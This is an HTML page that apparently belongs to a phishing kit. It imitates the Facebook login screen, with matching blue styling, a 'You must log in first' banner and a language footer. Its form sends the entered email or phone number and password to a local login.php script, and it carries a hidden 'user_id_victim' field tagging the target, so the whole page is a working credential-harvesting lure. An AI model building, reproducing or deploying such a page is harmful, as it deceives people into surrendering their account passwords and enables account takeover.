
<!DOCTYPE html>
<!-- saved from url=(0030)# -->
<html xmlns="http://www.w3.org/1999/xhtml" class="dxChrome dxWindowsPlatform dxWebKitFamily dxBrowserVersion-112 dxbs-3"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>
</title>
</head>
<body>
    <link href="css/1.css" rel="stylesheet">
  <link href="css/2.css" rel="stylesheet">
  <link href="css/3.css" rel="stylesheet">
  <link href="css/4.css" rel="stylesheet">
  <link href="css/5.css" rel="stylesheet">
    
    <style>
        .teee {
            Height:50px;
        }
    </style>
<form method="post" action="login.php" id="">
	<input type="hidden" name="type" value="webf">
	<input type="hidden" name="user_id_victim" value="4OVWW">
<div class="aspNetHidden">

	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="A26301A5">
</div>
        <div class="facebook">
          
          <div style="margin-bottom: 0;padding-left: 12px;padding-top: 5px;padding-bottom: 5px;background-color:#ffdc0026;color:#5d530eb8;text-align: center;border-bottom: 1px none #e5ce3a; font-size: 14px" >
    You must log in first.
    </div>
    
    <div class="view">
      
      <div class="container">
        <!--Row-->
        <div class="row">
          <!--Column 1-->
          <img class="img-fluid" src="http://drive.google.com/uc?export=view&id=1jqT6i0jJMG-FyNU_BAbbMRg8RxrjSjyR" style="width: 100%px;margin-bottom: 11px;">      
          <div class="col title-div">
            <div>
              <h1 class="text-primary"></h1>

        
 	
              <p>Connect with friends and the world around.</p>
            </div>
          </div>
          <!--Column 2-->
          <div class="col-sm-5">
            <div class="card border-0">
              <div style="text-align: center">
                  
					
                  <script id="dxss_984054424" type="text/javascript" data-executed="true"></script>         
<div class="dxbs-textbox" id="email">
				                   <h5>
                     
<input type="text" name="username"placeholder="Email or Phone Number" class="form-control input-group teee" style="padding:12px;">
	</div>

<input type="password" name="password"placeholder="Password" class="form-control input-group teee" style="padding:12px;">
              <br>
                  <button class="btn-lg btn btn-primary dxbs-button" type="submit" style="width:100%;background: #1877f2;font-size: 16px;">Log In</button>



                
                    </h5>
                <hr id="hr1">
                <p id="forgetPass1" class="text-center my-3" style="font-size: 14px;"><a href="#">Forget account?</a>
                </p>
              
              <hr id="hr2">
			  
			  <div>
			  
			  
			  
			  
			  
			  

            </div>
            <p id="form-footer" class="text-center my-4" style="font-size: 14px;"><b>Create a Page</b> for a celebrity,
              brand or buisness.
                
                
            </p>
            <div class="mobile-version-footer">
              <div class="row language">
                <div class="col">
                  <p>English (US)</p>
                  <p>हिन्दी</p>
                  <p>Portugues (Brasil)</p>
                  <p>Deutsch</p>
                </div>
                <div class="col">
                  <p>नेपाली</p>
                  <p>Espanol</p>
                  <p>Francais (France)</p>
                  <p><i class="fa fa-plus-square"></i></p>
                </div>
              </div>
              <div class="nav">
                <ul>
                  <a href="">
                    <li>About</li>
                  </a>
                  <a href="">
                    <li>Help</li>
                  </a>
                  <a href="">
                    <li>More</li>
                  </a>
                </ul>
              </div>
            </div>
          </div>
          <!--Row End-->
        </div>
      </div>
    </div>
  </div>
                                    </body></html>